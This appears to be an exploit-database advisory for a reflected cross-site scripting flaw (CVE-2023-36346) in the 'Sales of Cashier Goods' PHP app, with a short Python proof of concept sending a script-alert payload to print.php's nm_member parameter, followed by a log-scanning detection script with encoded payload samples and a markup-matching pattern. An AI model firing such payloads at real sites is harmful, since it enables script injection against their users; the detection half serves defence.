Sales of Cashier Goods v1.0 Cross Site Scripting (XSS)

2023.07.06
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79

# Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
# Date: 2023-06-23
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /print.php?nm_member=
# Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html
# Tested on: Windows/Linux
# CVE : CVE-2023-36346

import requests
import urllib.parse

# Set the target URL and payload
url = "http://example.com/print.php"
payload = "<script>alert('XSS')</script>"

# Encode the payload for URL inclusion
payload = urllib.parse.quote(payload)

# Build the request parameters
params = {
    "nm_member": payload
}

# Send the request and print the response
response = requests.get(url, params=params)
print(response.text)
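
A detection-side companion to the PoC above, added here as an example and not part of the original advisory or the vendor's code: it scans web access logs for requests to print.php whose nm_member value contains markup, decoding repeatedly so that payloads encoded more than once are still caught. The log format, the sample lines and the names SAMPLE_LOG, fully_decode and suspicious_requests are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed access-log lines for illustration (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [23/Jun/2023:10:01:02 +0000] "GET /print.php?nm_member=Budi+Santoso HTTP/1.1" 200 5120
203.0.113.9 - - [23/Jun/2023:10:02:11 +0000] "GET /print.php?nm_member=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E HTTP/1.1" 200 5188
203.0.113.9 - - [23/Jun/2023:10:02:15 +0000] "GET /print.php?nm_member=%253Cscript%253Ealert%2528%2527XSS%2527%2529%253C%2Fscript%253E HTTP/1.1" 200 5230
198.51.100.7 - - [23/Jun/2023:10:03:40 +0000] "GET /index.php?page=barang HTTP/1.1" 200 9021
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Markup characters and script-bearing attributes that a member name should never contain.
MARKUP_RE = re.compile(r'[<>"]|javascript:|\bon\w+\s*=', re.IGNORECASE)

def fully_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing (bounded number of rounds)."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(log_text, path="/print.php", param="nm_member"):
    """Return (client_ip, decoded_value) for requests whose parameter carries markup."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = urlsplit(m.group(1))
        if not target.path.endswith(path):
            continue
        # parse_qs decodes once; fully_decode removes any further encoding layers.
        for raw in parse_qs(target.query, keep_blank_values=True).get(param, []):
            value = fully_decode(raw)
            if MARKUP_RE.search(value):
                hits.append((line.split()[0], value))
    return hits

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} sent markup in nm_member: {value!r}")
```
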


Copyright 2024, cxsecurity.com